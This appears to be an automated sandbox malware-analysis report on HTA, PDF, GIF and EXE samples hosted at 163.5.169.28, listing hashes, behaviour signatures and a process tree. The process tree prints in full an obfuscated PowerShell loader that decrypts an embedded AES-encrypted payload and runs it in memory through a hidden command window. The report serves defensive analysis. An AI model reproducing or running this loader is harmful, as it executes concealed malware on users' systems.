Overview
overview
10Static
static
10163.5.169....r2.hta
windows7-x64
3163.5.169....r2.hta
windows10-2004-x64
8163.5.169....r2.pdf
windows7-x64
1163.5.169....r2.pdf
windows10-2004-x64
1163.5.169....r3.hta
windows7-x64
3163.5.169....r3.hta
windows10-2004-x64
10163.5.169....r3.pdf
windows7-x64
1163.5.169....r3.pdf
windows10-2004-x64
1163.5.169....r4.hta
windows7-x64
3163.5.169....r4.hta
windows10-2004-x64
7163.5.169....r4.pdf
windows7-x64
1163.5.169....r4.pdf
windows10-2004-x64
1163.5.169....r5.hta
windows7-x64
3163.5.169....r5.hta
windows10-2004-x64
10163.5.169....r5.pdf
windows7-x64
1163.5.169....r5.pdf
windows10-2004-x64
1163.5.169....r2.hta
windows7-x64
3163.5.169....r2.hta
windows10-2004-x64
7163.5.169....er.hta
windows7-x64
3163.5.169....er.hta
windows10-2004-x64
8163.5.169....r2.hta
windows7-x64
3163.5.169....r2.hta
windows10-2004-x64
1163.5.169....ry.gif
windows7-x64
1163.5.169....ry.gif
windows10-2004-x64
1163.5.169....nk.gif
windows7-x64
1163.5.169....nk.gif
windows10-2004-x64
1163.5.169.28/cmd.exe
windows7-x64
163.5.169.28/cmd.exe
windows10-2004-x64
1163.5.169.28/cmt.exe
windows7-x64
1163.5.169.28/cmt.exe
windows10-2004-x64
1163.5.169.28/fd1.exe
windows7-x64
10163.5.169.28/fd1.exe
windows10-2004-x64
10Analysis
-
max time kernel
122s -
max time network
126s -
platform
windows7_x64 -
resource
win7-20231215-en -
resource tags
arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system -
submitted
10-01-2024 21:28
Behavioral task
behavioral1
Sample
163.5.169.28/SCAN-atoletter2.hta
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
163.5.169.28/SCAN-atoletter2.hta
Resource
win10v2004-20231215-en
Behavioral task
behavioral3
Sample
163.5.169.28/SCAN-atoletter2.pdf
Resource
win7-20231215-en
Behavioral task
behavioral4
Sample
163.5.169.28/SCAN-atoletter2.pdf
Resource
win10v2004-20231222-en
Behavioral task
behavioral5
Sample
163.5.169.28/SCAN-atoletter3.hta
Resource
win7-20231215-en
Behavioral task
behavioral6
Sample
163.5.169.28/SCAN-atoletter3.hta
Resource
win10v2004-20231215-en
Behavioral task
behavioral7
Sample
163.5.169.28/SCAN-atoletter3.pdf
Resource
win7-20231215-en
Behavioral task
behavioral8
Sample
163.5.169.28/SCAN-atoletter3.pdf
Resource
win10v2004-20231222-en
Behavioral task
behavioral9
Sample
163.5.169.28/SCAN-atoletter4.hta
Resource
win7-20231129-en
Behavioral task
behavioral10
Sample
163.5.169.28/SCAN-atoletter4.hta
Resource
win10v2004-20231215-en
Behavioral task
behavioral11
Sample
163.5.169.28/SCAN-atoletter4.pdf
Resource
win7-20231129-en
Behavioral task
behavioral12
Sample
163.5.169.28/SCAN-atoletter4.pdf
Resource
win10v2004-20231215-en
Behavioral task
behavioral13
Sample
163.5.169.28/SCAN-atoletter5.hta
Resource
win7-20231215-en
Behavioral task
behavioral14
Sample
163.5.169.28/SCAN-atoletter5.hta
Resource
win10v2004-20231215-en
Behavioral task
behavioral15
Sample
163.5.169.28/SCAN-atoletter5.pdf
Resource
win7-20231215-en
Behavioral task
behavioral16
Sample
163.5.169.28/SCAN-atoletter5.pdf
Resource
win10v2004-20231215-en
Behavioral task
behavioral17
Sample
163.5.169.28/ato_letter2.hta
Resource
win7-20231215-en
Behavioral task
behavioral18
Sample
163.5.169.28/ato_letter2.hta
Resource
win10v2004-20231222-en
Behavioral task
behavioral19
Sample
163.5.169.28/atoletter.hta
Resource
win7-20231129-en
Behavioral task
behavioral20
Sample
163.5.169.28/atoletter.hta
Resource
win10v2004-20231222-en
Behavioral task
behavioral21
Sample
163.5.169.28/atoletter2.hta
Resource
win7-20231215-en
Behavioral task
behavioral22
Sample
163.5.169.28/atoletter2.hta
Resource
win10v2004-20231215-en
Behavioral task
behavioral23
Sample
163.5.169.28/binary.gif
Resource
win7-20231129-en
Behavioral task
behavioral24
Sample
163.5.169.28/binary.gif
Resource
win10v2004-20231215-en
Behavioral task
behavioral25
Sample
163.5.169.28/blank.gif
Resource
win7-20231215-en
Behavioral task
behavioral26
Sample
163.5.169.28/blank.gif
Resource
win10v2004-20231215-en
Behavioral task
behavioral27
Sample
163.5.169.28/cmd.exe
Resource
win7-20231215-en
Behavioral task
behavioral28
Sample
163.5.169.28/cmd.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral29
Sample
163.5.169.28/cmt.exe
Resource
win7-20231215-en
Behavioral task
behavioral30
Sample
163.5.169.28/cmt.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral31
Sample
163.5.169.28/fd1.exe
Resource
win7-20231129-en
Behavioral task
behavioral32
Sample
163.5.169.28/fd1.exe
Resource
win10v2004-20231222-en
General
-
Target
163.5.169.28/ato_letter2.hta
-
Size
1.1MB
-
MD5
54ff1471d93aa84c94efd8cbae4c6c78
-
SHA1
11c7d8cd8e02b27aee846c353c32b114a7daa3bf
-
SHA256
e1869d3a88c9190cf43014e3cb48562fc220ff7f6d5baed77c7dfa1c84c5d530
-
SHA512
5eed6c7f0ffc27e96349fa8fc7c959e87ff35561da2b811f2e59c0fa0bd42f53debd4079da4c1df133b8211c38ef48f03b3f8b5471370bcf6ed79d240fdde804
-
SSDEEP
1536:SwxapK31kELNEZ1fos0mr/l1vcmafSIm+lIWFR9UU5gou0gQixFaVEYkEOvMXu+f:SOapK31RBEDws7g
Malware Config
Signatures
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
description ioc Process Key created \REGISTRY\USER\S-1-5-21-452311807-3713411997-1028535425-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Suspicious behavior: EnumeratesProcesses 5 IoCs
pid Process 2364 powershell.exe 2364 powershell.exe 2364 powershell.exe 2788 powershell.exe 2772 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 2364 powershell.exe Token: SeDebugPrivilege 2788 powershell.exe Token: SeDebugPrivilege 2772 powershell.exe -
Suspicious use of WriteProcessMemory 16 IoCs
description pid Process procid_target PID 2200 wrote to memory of 2364 2200 mshta.exe 28 PID 2200 wrote to memory of 2364 2200 mshta.exe 28 PID 2200 wrote to memory of 2364 2200 mshta.exe 28 PID 2200 wrote to memory of 2364 2200 mshta.exe 28 PID 2364 wrote to memory of 2280 2364 powershell.exe 33 PID 2364 wrote to memory of 2280 2364 powershell.exe 33 PID 2364 wrote to memory of 2280 2364 powershell.exe 33 PID 2364 wrote to memory of 2280 2364 powershell.exe 33 PID 2280 wrote to memory of 2772 2280 cmd.exe 31 PID 2280 wrote to memory of 2772 2280 cmd.exe 31 PID 2280 wrote to memory of 2772 2280 cmd.exe 31 PID 2280 wrote to memory of 2772 2280 cmd.exe 31 PID 2280 wrote to memory of 2788 2280 cmd.exe 30 PID 2280 wrote to memory of 2788 2280 cmd.exe 30 PID 2280 wrote to memory of 2788 2280 cmd.exe 30 PID 2280 wrote to memory of 2788 2280 cmd.exe 30
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\163.5.169.28\ato_letter2.hta"1⤵
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2200 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted Start-Process 'cmd.exe' -WindowStyle hidden -ArgumentList {/c powershell.exe $HeikUII = 'AAAAAAAAAAAAAAAAAAAAAJUqOuW4KC6NBAvMfuqK6bp8mGb6bLm9fWAzjp5jn2QEw1DPIAEVLR/tM1tCOABSJYRJIHsHR+nwBtm/eM3I4TTMXEl/ET9CnIbNyvlt9/LNK1ip+uHxXawFKuZDcM0aZtYYe0NhVAm2cqLZRezYxIP823MoH345L2oPsU/6qv3e6g7/iM9o/BVj0e6LhtUV/LwvA2y8SMIyzvW6Rj9MOWuoo5XUYhYSSit4x9Hpn6LHbZBbpW4rMdUxi3ATLDlKoEf0ZlThOxM9di4jM96Tov2ZVqD3Z25V2DxXbkgCdfuHSu7Tooif4YOU9/3JOuRksBwJWYcJ/JFWZAw6/jelCh7i3M6i6V4QSX+fbsJ8CEawMAVCsEHorjcl+DUqZ9Lzsanb3FtB0GJhJUPhvNBZSS9QpBdKbuQnOWC0BBbJIzCRtxKiM26p2m2M/k+QoZIMMSuhVkj5rfIzRuWIdrFxftSMHly9ShtWAqvLz3oX/BuQShbNWHUUe+/N9jMmQeNa6pVq4Y8EfDBgMfrIdsEOu70AWm4FX3LyK5ybwUXhVrgjuPTzSiaZtFFWGtseCLOv5b4HDcOwji4TJjO7BSqcmfz5gk4hzX2m3Gc4iafh9JfgLdkI2OFBKGZ3nngRvgzwPXYBIhqYS+r6NJWTRnREQ2FLRd38VmAa5arOcvP7IF4DG/ofVajmN9oIRJfWm4z0LW7xZJ27y6hZy5Ol7xPcumURWTr9iCTw9Rgb6lWAwkimXI4qGUIYjctFodN9qoPSsic/NCPDFyhKu9epCQ9nl4QVCzvxfSGvM7KllLg3Plv0QdDTJbWOQufrtzK51hDZR2Mz5UqPKtOqYIj+lnQfkLgdetwhGRtXY8fRTn9IxEleTtaYsMHls8d5tF0ZcH1Qgi1HHUXiBV8Lt4uHmZdsQoGMO7ZrToHgDEVe7QlOKRPvsEfjhObpc7ozW7iRXL6kUAXUIj8zbeCrj5evGSp4ELA8XoFZ9lCBQv7XVk/2HqhP/lDfU+MXM5hzNUj9ugx06eJBK4Fh4r2yMpj43uG5Om4=';$JNqAj = 'TG9HTmhqa2hYUWhoRHdiSVRNZm1kekxRRGVVam1uVVY=';$lYZTTWkh = New-Object 'System.Security.Cryptography.AesManaged';$lYZTTWkh.Mode = [System.Security.Cryptography.CipherMode]::ECB;$lYZTTWkh.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$lYZTTWkh.BlockSize = 128;$lYZTTWkh.KeySize = 256;$lYZTTWkh.Key = [System.Convert]::FromBase64String($JNqAj);$zlRIi = [System.Convert]::FromBase64String($HeikUII);$HyakcEgs = $zlRIi[0..15];$lYZTTWkh.IV = $HyakcEgs;$lfJyAqixo = $lYZTTWkh.CreateDecryptor();$JvbLhIVwZ = $lfJyAqixo.TransformFinalBlock($zlRIi, 16, $zlRIi.Length - 16);$lYZTTWkh.Dispose();$JExI = New-Object System.IO.MemoryStream( , $JvbLhIVwZ );$PcPXihBj = New-Object System.IO.MemoryStream;$HbjrfOhba = New-Object System.IO.Compression.GzipStream $JExI, ([IO.Compression.CompressionMode]::Decompress);$HbjrfOhba.CopyTo( $PcPXihBj );$HbjrfOhba.Close();$JExI.Close();[byte[]] $vpbeKa = $PcPXihBj.ToArray();$JVZpEn = [System.Text.Encoding]::UTF8.GetString($vpbeKa);$JVZpEn | powershell - }2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2364 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c powershell.exe $HeikUII = 'AAAAAAAAAAAAAAAAAAAAAJUqOuW4KC6NBAvMfuqK6bp8mGb6bLm9fWAzjp5jn2QEw1DPIAEVLR/tM1tCOABSJYRJIHsHR+nwBtm/eM3I4TTMXEl/ET9CnIbNyvlt9/LNK1ip+uHxXawFKuZDcM0aZtYYe0NhVAm2cqLZRezYxIP823MoH345L2oPsU/6qv3e6g7/iM9o/BVj0e6LhtUV/LwvA2y8SMIyzvW6Rj9MOWuoo5XUYhYSSit4x9Hpn6LHbZBbpW4rMdUxi3ATLDlKoEf0ZlThOxM9di4jM96Tov2ZVqD3Z25V2DxXbkgCdfuHSu7Tooif4YOU9/3JOuRksBwJWYcJ/JFWZAw6/jelCh7i3M6i6V4QSX+fbsJ8CEawMAVCsEHorjcl+DUqZ9Lzsanb3FtB0GJhJUPhvNBZSS9QpBdKbuQnOWC0BBbJIzCRtxKiM26p2m2M/k+QoZIMMSuhVkj5rfIzRuWIdrFxftSMHly9ShtWAqvLz3oX/BuQShbNWHUUe+/N9jMmQeNa6pVq4Y8EfDBgMfrIdsEOu70AWm4FX3LyK5ybwUXhVrgjuPTzSiaZtFFWGtseCLOv5b4HDcOwji4TJjO7BSqcmfz5gk4hzX2m3Gc4iafh9JfgLdkI2OFBKGZ3nngRvgzwPXYBIhqYS+r6NJWTRnREQ2FLRd38VmAa5arOcvP7IF4DG/ofVajmN9oIRJfWm4z0LW7xZJ27y6hZy5Ol7xPcumURWTr9iCTw9Rgb6lWAwkimXI4qGUIYjctFodN9qoPSsic/NCPDFyhKu9epCQ9nl4QVCzvxfSGvM7KllLg3Plv0QdDTJbWOQufrtzK51hDZR2Mz5UqPKtOqYIj+lnQfkLgdetwhGRtXY8fRTn9IxEleTtaYsMHls8d5tF0ZcH1Qgi1HHUXiBV8Lt4uHmZdsQoGMO7ZrToHgDEVe7QlOKRPvsEfjhObpc7ozW7iRXL6kUAXUIj8zbeCrj5evGSp4ELA8XoFZ9lCBQv7XVk/2HqhP/lDfU+MXM5hzNUj9ugx06eJBK4Fh4r2yMpj43uG5Om4=';$JNqAj = 'TG9HTmhqa2hYUWhoRHdiSVRNZm1kekxRRGVVam1uVVY=';$lYZTTWkh = New-Object 'System.Security.Cryptography.AesManaged';$lYZTTWkh.Mode = [System.Security.Cryptography.CipherMode]::ECB;$lYZTTWkh.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$lYZTTWkh.BlockSize = 128;$lYZTTWkh.KeySize = 256;$lYZTTWkh.Key = [System.Convert]::FromBase64String($JNqAj);$zlRIi = [System.Convert]::FromBase64String($HeikUII);$HyakcEgs = $zlRIi[0..15];$lYZTTWkh.IV = $HyakcEgs;$lfJyAqixo = $lYZTTWkh.CreateDecryptor();$JvbLhIVwZ = $lfJyAqixo.TransformFinalBlock($zlRIi, 16, $zlRIi.Length - 16);$lYZTTWkh.Dispose();$JExI = New-Object System.IO.MemoryStream( , $JvbLhIVwZ );$PcPXihBj = New-Object System.IO.MemoryStream;$HbjrfOhba = New-Object System.IO.Compression.GzipStream $JExI, ([IO.Compression.CompressionMode]::Decompress);$HbjrfOhba.CopyTo( $PcPXihBj );$HbjrfOhba.Close();$JExI.Close();[byte[]] $vpbeKa = $PcPXihBj.ToArray();$JVZpEn = [System.Text.Encoding]::UTF8.GetString($vpbeKa);$JVZpEn | powershell -3⤵
- Suspicious use of WriteProcessMemory
PID:2280
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2788
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe $HeikUII = 'AAAAAAAAAAAAAAAAAAAAAJUqOuW4KC6NBAvMfuqK6bp8mGb6bLm9fWAzjp5jn2QEw1DPIAEVLR/tM1tCOABSJYRJIHsHR+nwBtm/eM3I4TTMXEl/ET9CnIbNyvlt9/LNK1ip+uHxXawFKuZDcM0aZtYYe0NhVAm2cqLZRezYxIP823MoH345L2oPsU/6qv3e6g7/iM9o/BVj0e6LhtUV/LwvA2y8SMIyzvW6Rj9MOWuoo5XUYhYSSit4x9Hpn6LHbZBbpW4rMdUxi3ATLDlKoEf0ZlThOxM9di4jM96Tov2ZVqD3Z25V2DxXbkgCdfuHSu7Tooif4YOU9/3JOuRksBwJWYcJ/JFWZAw6/jelCh7i3M6i6V4QSX+fbsJ8CEawMAVCsEHorjcl+DUqZ9Lzsanb3FtB0GJhJUPhvNBZSS9QpBdKbuQnOWC0BBbJIzCRtxKiM26p2m2M/k+QoZIMMSuhVkj5rfIzRuWIdrFxftSMHly9ShtWAqvLz3oX/BuQShbNWHUUe+/N9jMmQeNa6pVq4Y8EfDBgMfrIdsEOu70AWm4FX3LyK5ybwUXhVrgjuPTzSiaZtFFWGtseCLOv5b4HDcOwji4TJjO7BSqcmfz5gk4hzX2m3Gc4iafh9JfgLdkI2OFBKGZ3nngRvgzwPXYBIhqYS+r6NJWTRnREQ2FLRd38VmAa5arOcvP7IF4DG/ofVajmN9oIRJfWm4z0LW7xZJ27y6hZy5Ol7xPcumURWTr9iCTw9Rgb6lWAwkimXI4qGUIYjctFodN9qoPSsic/NCPDFyhKu9epCQ9nl4QVCzvxfSGvM7KllLg3Plv0QdDTJbWOQufrtzK51hDZR2Mz5UqPKtOqYIj+lnQfkLgdetwhGRtXY8fRTn9IxEleTtaYsMHls8d5tF0ZcH1Qgi1HHUXiBV8Lt4uHmZdsQoGMO7ZrToHgDEVe7QlOKRPvsEfjhObpc7ozW7iRXL6kUAXUIj8zbeCrj5evGSp4ELA8XoFZ9lCBQv7XVk/2HqhP/lDfU+MXM5hzNUj9ugx06eJBK4Fh4r2yMpj43uG5Om4=';$JNqAj = 'TG9HTmhqa2hYUWhoRHdiSVRNZm1kekxRRGVVam1uVVY=';$lYZTTWkh = New-Object 'System.Security.Cryptography.AesManaged';$lYZTTWkh.Mode = [System.Security.Cryptography.CipherMode]::ECB;$lYZTTWkh.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$lYZTTWkh.BlockSize = 128;$lYZTTWkh.KeySize = 256;$lYZTTWkh.Key = [System.Convert]::FromBase64String($JNqAj);$zlRIi = [System.Convert]::FromBase64String($HeikUII);$HyakcEgs = $zlRIi[0..15];$lYZTTWkh.IV = $HyakcEgs;$lfJyAqixo = $lYZTTWkh.CreateDecryptor();$JvbLhIVwZ = $lfJyAqixo.TransformFinalBlock($zlRIi, 16, $zlRIi.Length - 16);$lYZTTWkh.Dispose();$JExI = New-Object System.IO.MemoryStream( , $JvbLhIVwZ );$PcPXihBj = New-Object System.IO.MemoryStream;$HbjrfOhba = New-Object System.IO.Compression.GzipStream $JExI, ([IO.Compression.CompressionMode]::Decompress);$HbjrfOhba.CopyTo( $PcPXihBj );$HbjrfOhba.Close();$JExI.Close();[byte[]] $vpbeKa = $PcPXihBj.ToArray();$JVZpEn = [System.Text.Encoding]::UTF8.GetString($vpbeKa);$JVZpEn1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2772
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize7KB
MD58ebfdb5a2c991628df1b89fa49d52605
SHA13e4dfb698d33f2bc9b179190ed6b51fa790fc4b3
SHA256d94370c5b2959031a3abfb8426b0c6774933e4b39f2616839ed3576ff0f3a71d
SHA512c1e2df04833c90558e872fd37b233421a85199d22c1f2cec58c4044816186023207585c7650425165c9b4109e6586d6f56edb3662f7ff52754a72f9609de3084